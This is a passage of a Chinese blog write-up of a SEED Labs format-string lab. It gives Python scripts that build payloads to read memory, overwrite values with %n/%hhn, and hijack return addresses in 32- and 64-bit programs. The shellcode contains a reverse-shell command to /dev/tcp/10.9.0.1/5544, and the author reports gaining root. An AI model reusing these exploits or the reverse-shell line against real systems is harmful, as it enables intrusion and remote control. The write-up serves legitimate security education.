content<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span>number<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>

s<span class="token operator">=</span><span class="token string">"%64$s."</span>

fmt  <span class="token operator">=</span> <span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token operator">+</span><span class="token builtin">len</span><span class="token punctuation">(</span>fmt<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> fmt

<span class="token comment"># Write the content to badfile</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>执行后结果如下，发现直接打印出字符串内容</p>
<p><img src="/2026/05/24/seedlab-format-string/1779607642768.png" alt="堆中字符串"></p>
<h2 id="任务三：修改内存"><a href="#任务三：修改内存" class="headerlink" title="任务三：修改内存"></a>任务三：修改内存</h2><p>我们从先前截图中可以看到，target前后的值保持不变。本节则是要对其进行修改，并通过服务器回显验证修改是否成功</p>
<p>分别尝试将target修改为0x5000与0xAABBCCDD</p>
<p>由于前者数字较小，我们可以直接暴力打印0x5000个字符串用于%n参数的输入，具体代码如下。可以看到我们通过%(num)x的方式额外打印了(0x5000-4)个字符</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys

N <span class="token operator">=</span> <span class="token number">1500</span>
content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x0</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>N<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment"># This line shows how to store a 4-byte integer at offset 0</span>
number  <span class="token operator">=</span> <span class="token number">0x080e5068</span>
content<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span>number<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
s<span class="token operator">=</span><span class="token string">"%20476x%64$n\n"</span>
fmt  <span class="token operator">=</span> <span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token operator">+</span><span class="token builtin">len</span><span class="token punctuation">(</span>fmt<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> fmt

<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>该代码运行结果如下所示：在打印出足够多的字符后，向target写入数据，成功修改其值为0x5000</p>
<p><img src="/2026/05/24/seedlab-format-string/1779608574460.png" alt="0x5000结果"></p>
<p>接下来我们挑战0xAABBCCDD由于该数字过于庞大，直接打印相对应的字符很不现实，因此我们借助%hhn,每次写入一个字节，快速完成赋值</p>
<p>构造代码如下（一定要注意，我们是小端序存入，高位对应高地址！！！）为了避免%x的输出，我们使用%c来进行%n数值的校准</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys

<span class="token comment"># Initialize the content array</span>
N <span class="token operator">=</span> <span class="token number">1500</span>
content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x0</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>N<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment"># This line shows how to store a 4-byte integer at offset 0</span>
D  <span class="token operator">=</span> <span class="token number">0x080e5068</span>
C  <span class="token operator">=</span> <span class="token number">0x080e5069</span>
B  <span class="token operator">=</span> <span class="token number">0x080e506A</span>
A  <span class="token operator">=</span> <span class="token number">0x080e506b</span>
content<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span>A<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token number">8</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span>B<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">:</span><span class="token number">12</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span>C<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">12</span><span class="token punctuation">:</span><span class="token number">16</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span>D<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span>byteorder<span class="token operator">=</span><span class="token string">'little'</span><span class="token punctuation">)</span>

s<span class="token operator">=</span><span class="token string">"%154c%64$hhn%17c%65$hhn%17c%66$hhn%17c%67$hhn\n"</span>

fmt  <span class="token operator">=</span> <span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">16</span><span class="token punctuation">:</span><span class="token number">16</span><span class="token operator">+</span><span class="token builtin">len</span><span class="token punctuation">(</span>fmt<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> fmt

<span class="token comment"># Write the content to badfile</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>执行代码后结果如下,明显可以看出打印的字符数量大幅度减小，更加节约时间了</p>
<p><img src="/2026/05/24/seedlab-format-string/1779609997475.png" alt="0xAABBCCDD"></p>
<h2 id="任务四：shellcode注入"><a href="#任务四：shellcode注入" class="headerlink" title="任务四：shellcode注入"></a>任务四：shellcode注入</h2><p>在注入开始前，我们先根据本节实验指南，回答以下问题。首先ret_addr&#x3D;ebp+4&#x3D;0xfffd27c,main中的buf可直接在服务器回显中得知：0xffffd350</p>
<p>format_string到的字符串所在位置的偏移量为64个参数（4bit*64），</p>
<p><img src="/2026/05/24/seedlab-format-string/1779610797108.png" alt="栈结构图"></p>
<p>在上述基础上，我们采用缓冲区溢出一节的shellcode，尝试操控myprintf的ret_addr，将其指向buf中的shellcode区域，完成攻击</p>
<p>为实现上述任务目标，我们在exploit.py的基础上进行了如下改动，通过%hn对ret地址进行修改，使其指向我们的shellcode区域。完成攻击！！！</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys

<span class="token comment"># 32-bit Generic Shellcode </span>
shellcode <span class="token operator">=</span> <span class="token punctuation">(</span>
   <span class="token string">"\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"</span>
   <span class="token string">"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"</span>
   <span class="token string">"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"</span>
   <span class="token string">"/bin/bash*"</span>
   <span class="token string">"-c*"</span>
   <span class="token comment"># The * in this line serves as the position marker         *</span>
   <span class="token string">"echo 2;/bin/sh -i > /dev/tcp/10.9.0.1/5544 0&lt;&amp;1 2>&amp;1      *"</span>
   <span class="token string">"AAAA"</span>   <span class="token comment"># Placeholder for argv[0] --> "/bin/bash"</span>
   <span class="token string">"BBBB"</span>   <span class="token comment"># Placeholder for argv[1] --> "-c"</span>
   <span class="token string">"CCCC"</span>   <span class="token comment"># Placeholder for argv[2] --> the command string</span>
   <span class="token string">"DDDD"</span>   <span class="token comment"># Placeholder for argv[3] --> NULL</span>
<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>

N <span class="token operator">=</span> <span class="token number">1500</span>
<span class="token comment"># Fill the content with NOP's</span>
content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x90</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>N<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token comment">#136</span>
<span class="token comment"># Put the shellcode somewhere in the payload</span>
start <span class="token operator">=</span> <span class="token number">1000</span>               <span class="token comment"># Change this number</span>
content<span class="token punctuation">[</span>start<span class="token punctuation">:</span>start <span class="token operator">+</span> <span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> shellcode

<span class="token comment">############################################################</span>
<span class="token comment">#</span>
<span class="token comment">#    Construct the format string here</span>
<span class="token comment"># </span>
<span class="token comment">############################################################</span>
shell_addr<span class="token operator">=</span><span class="token number">0xffffd700</span> <span class="token comment"># whrer shellcode</span>
ret_addr<span class="token operator">=</span><span class="token number">0xffffd42c</span>
ret2_addr<span class="token operator">=</span><span class="token number">0xffffd42e</span>
content<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span>ret_addr<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token string">"little"</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span>ret2_addr<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token string">"little"</span><span class="token punctuation">)</span>
s<span class="token operator">=</span><span class="token string">"%55032c%64$hn%10495c%65$hn"</span>
fmt<span class="token operator">=</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">"latin-1"</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">:</span><span class="token number">8</span><span class="token operator">+</span><span class="token builtin">len</span><span class="token punctuation">(</span>fmt<span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token operator">=</span>fmt


<span class="token comment"># Save the format string to file</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>代码执行结果如下图，发现成功获取root权限</p>
<p><img src="/2026/05/24/seedlab-format-string/1779615831939.png" alt="攻击成功"></p>
<h2 id="任务五：攻击64位程序"><a href="#任务五：攻击64位程序" class="headerlink" title="任务五：攻击64位程序"></a>任务五：攻击64位程序</h2><p>同strcpy，此处的攻击依然要考虑64位地址出现0的情况。如果printf在解析过程中遇到0x00字节，则会默认字符串完结，不再对后面部分进行解析。因此，本任务中应当将地址放在字符串的最末尾处，同时为了确保偏移量不变，我们可以将地址固定在一个input的offset上，便于我们格式化字符串的编写，如代码所示</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys

<span class="token comment"># 64-bit Generic Shellcode </span>
shellcode <span class="token operator">=</span> <span class="token punctuation">(</span>
   <span class="token string">"\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"</span>
   <span class="token string">"\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"</span>
   <span class="token string">"\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"</span>
   <span class="token string">"\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"</span>
   <span class="token string">"/bin/bash*"</span>
   <span class="token string">"-c*"</span>
   <span class="token comment"># The * in this line serves as the position marker         *</span>
   <span class="token string">"echo 2;/bin/sh -i > /dev/tcp/10.9.0.1/5544 0&lt;&amp;1 2>&amp;1      *"</span>
   <span class="token string">"AAAAAAAA"</span>   <span class="token comment"># Placeholder for argv[0] --> "/bin/bash"</span>
   <span class="token string">"BBBBBBBB"</span>   <span class="token comment"># Placeholder for argv[1] --> "-c"</span>
   <span class="token string">"CCCCCCCC"</span>   <span class="token comment"># Placeholder for argv[2] --> the command string</span>
   <span class="token string">"DDDDDDDD"</span>   <span class="token comment"># Placeholder for argv[3] --> NULL</span>
<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>

N <span class="token operator">=</span> <span class="token number">1500</span>
<span class="token comment"># Fill the content with NOP's</span>
content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x90</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>N<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment"># Choose the shellcode version based on your target</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token comment">#136</span>
<span class="token comment"># Put the shellcode somewhere in the payload</span>
start <span class="token operator">=</span> <span class="token number">1000</span>               <span class="token comment"># Change this number</span>
content<span class="token punctuation">[</span>start<span class="token punctuation">:</span>start <span class="token operator">+</span> <span class="token builtin">len</span><span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> shellcode

<span class="token comment">############################################################</span>
<span class="token comment">#</span>
<span class="token comment">#    Construct the format string here</span>
<span class="token comment"># </span>
<span class="token comment">############################################################</span>
shell_addr<span class="token operator">=</span><span class="token number">0x00007fffffffe800</span> <span class="token comment">#depending on nops</span>
ret_addr<span class="token operator">=</span><span class="token number">0x00007fffffffe378</span>
ret2_addr<span class="token operator">=</span><span class="token number">0x00007fffffffe37a</span>
ret3_addr<span class="token operator">=</span><span class="token number">0x00007fffffffe37c</span>
s<span class="token operator">=</span><span class="token string">"%32767c"</span><span class="token operator">+</span><span class="token string">"%46$hn"</span><span class="token operator">+</span><span class="token string">"%26625c"</span><span class="token operator">+</span><span class="token string">"%44$hn"</span><span class="token operator">+</span><span class="token string">"%6143c"</span><span class="token operator">+</span><span class="token string">"%45$hn"</span><span class="token operator">+</span><span class="token string">'\n'</span>
fmt<span class="token operator">=</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token builtin">len</span><span class="token punctuation">(</span>fmt<span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token operator">=</span>fmt
ret_offset<span class="token operator">=</span><span class="token number">80</span> <span class="token comment">#fixed offset</span>
content<span class="token punctuation">[</span>ret_offset<span class="token punctuation">:</span>ret_offset<span class="token operator">+</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span>ret_addr<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">"little"</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span>ret_offset<span class="token operator">+</span><span class="token number">8</span><span class="token punctuation">:</span>ret_offset<span class="token operator">+</span><span class="token number">16</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span>ret2_addr<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">"little"</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span>ret_offset<span class="token operator">+</span><span class="token number">16</span><span class="token punctuation">:</span>ret_offset<span class="token operator">+</span><span class="token number">24</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span>ret3_addr<span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">"little"</span><span class="token punctuation">)</span>

<span class="token comment"># Save the format string to file</span>
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>根据以上方式我们可以绕过printf解析的0限制，成功攻击64位程序，结果如图</p>
<p><img src="/2026/05/24/seedlab-format-string/1779618119115.png" alt="64位攻击"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Yssx</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://Yssx-g.github.io/2026/05/24/seedlab-format-string/">https://Yssx-g.github.io/2026/05/24/seedlab-format-string/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Yssx</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/SEED-LAB/">
                                    <span class="chip bg-color">SEED_LAB</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'SiTo63aMVHKbeTEWaaDA7yKT-gzGzoHsz',
        appKey: 'gtZzENvb4A18gTdqF2Koeky7',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'gogogo'
    });
</script>

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2026/05/24/seedlab-shellcode/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/18.jpg" class="responsive-img" alt="SEEDLAB_SHELLCODE">
                        
                        <span class="card-title">SEEDLAB_SHELLCODE</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            SeedLab实验（本节实验网址https://seedsecuritylabs.org/chinese/labs/Software/Shellcode/）
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2026-05-24
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" class="post-category">
                                    软件安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SEED-LAB/">
                        <span class="chip bg-color">SEED_LAB</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/05/21/seedlab-retlib/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="SEEDLAB_RETLIB">
                        
                        <span class="card-title">SEEDLAB_RETLIB</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            SeedLab实验（本节实验网址https://seedsecuritylabs.org/chinese/labs/Software/Return_to_Libc/）
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-05-21
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" class="post-category">
                                    软件安全
